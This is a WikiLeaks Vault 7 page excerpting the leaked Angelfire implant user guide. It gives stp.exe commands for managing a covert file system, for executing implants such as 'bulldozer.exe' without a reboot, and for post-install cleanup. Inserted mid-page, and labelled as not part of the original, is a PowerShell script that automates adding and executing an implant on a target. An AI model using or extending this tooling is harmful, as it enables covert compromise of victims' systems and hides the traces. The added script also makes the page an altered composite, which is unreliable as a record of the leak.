Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//20341105
3.9.6 (S) Deleting an executable from the covert file system (-x)
(S) To delete an executable from the covert file system, use the -x option. The file name
specified must match the file name in the covert file system exactly. Note that to delete
an executable, you might also have to delete its command line file (see the -f option).
Example of deleting a file from the covert file system:
stp.exe -x 001xserver.exe
3.10 (S) Listing The Contents Of The Covert File System (-l)
(S) To list the names of all files in the covert file system, use the -l option.
stp.exe -l
3.11 (S) Getting a File From The Covert File System (-g)
(S) To get a file from the covert file system, use the -g option. Note that this will write
the file to the target's local file system. This might not be desirable depending on the
contents of the file.
Parameters for using the -g option:
stp.exe -g <file to get> <full destination path to file>
3.12 (S) Executing binaries on an existing install without reboot (-k)
(S) If Angelfire is already installed and running on a system, you may use the -k option
to execute a binary immediately. The implant or driver must either be already in the
covert store or added using the -f option. The file name specified in the -k option is case
sensitive. The Angelfire driver polls periodically for new files to execute, so it might take
a few seconds for the implant to execute after doing a -k. Only one -k execution can be
done at a time. The previous one must finish before stp.exe allows another one to occur.
To determine if there is an outstanding execution, do a file listing and look for the file
_drop. Here is an example of a sequence of commands that would add bulldozer.exe to
the covert store and then immediately execute it:
stp.exe -f bulldozer.exe -c -a 10.3.2.50 -p 1999
stp.exe -k bulldozer.exe
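The same add-then-execute sequence with the outstanding-execution check the guide describes, as an added PowerShell example that is not part of the original Angelfire guide. It assumes stp.exe sits in the current directory, that "stp.exe -l" prints one covert-store file name per line and that stp.exe returns a non-zero exit code on failure (none of which the guide states); the host, port and file name are the guide's own placeholders, and the meaning of the -c, -a and -p arguments is not described on this page, so they are passed through unchanged.

```powershell
# Added example, not from the Angelfire user guide.
# Assumptions (not stated in the guide): stp.exe is in the current directory,
# "stp.exe -l" prints one file name per line, and a non-zero exit code means failure.

function Test-AngelfireDropPending {
    # The guide: an outstanding -k execution shows up as the file "_drop" in the listing.
    $listing = & .\stp.exe -l 2>&1
    return [bool]($listing | Where-Object { ($_ -as [string]).Trim() -eq '_drop' })
}

function Wait-AngelfireDrop {
    param([int]$TimeoutSeconds = 60, [int]$PollSeconds = 2)
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    while ((Get-Date) -lt $deadline) {
        if (-not (Test-AngelfireDropPending)) { return $true }
        Start-Sleep -Seconds $PollSeconds
    }
    return $false
}

function Invoke-AngelfireExec {
    param(
        # Name in the covert store; the guide says -k matches it case-sensitively.
        [Parameter(Mandatory)][string]$Binary,
        # Extra arguments handed to "-f" when the binary must first be added
        # (e.g. '-c','-a','10.3.2.50','-p','1999' as in the guide's example).
        [string[]]$AddArguments = @()
    )
    # Only one -k may be outstanding at a time; refuse rather than queue a second one.
    if (-not (Wait-AngelfireDrop)) {
        throw 'A previous -k execution is still outstanding (_drop present in the listing).'
    }
    if ($AddArguments.Count -gt 0) {
        & .\stp.exe -f $Binary @AddArguments
        if ($LASTEXITCODE -ne 0) { throw "stp.exe -f failed (exit code $LASTEXITCODE)" }
    }
    & .\stp.exe -k $Binary
    if ($LASTEXITCODE -ne 0) { throw "stp.exe -k failed (exit code $LASTEXITCODE)" }
}

# Usage, mirroring the guide's two-command sequence (placeholder host and port):
Invoke-AngelfireExec -Binary 'bulldozer.exe' -AddArguments @('-c', '-a', '10.3.2.50', '-p', '1999')
```

The driver polls for new files, so even after Invoke-AngelfireExec returns the binary may take a few seconds to start; a second call will block on Wait-AngelfireDrop until _drop disappears from the listing or the timeout expires.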
4. (U) Operational Notes
4.1 (S) Post install cleanup
(S) After installation, uninstallation, update, or any covert file system activity, all
Angelfire related files may be deleted with the exception of the container file that was
created as part of the installation process. Additionally, any driver implant or user
af+mainrepo+wolfcreek+Docs+Angelfire_UserGuide
13 of 21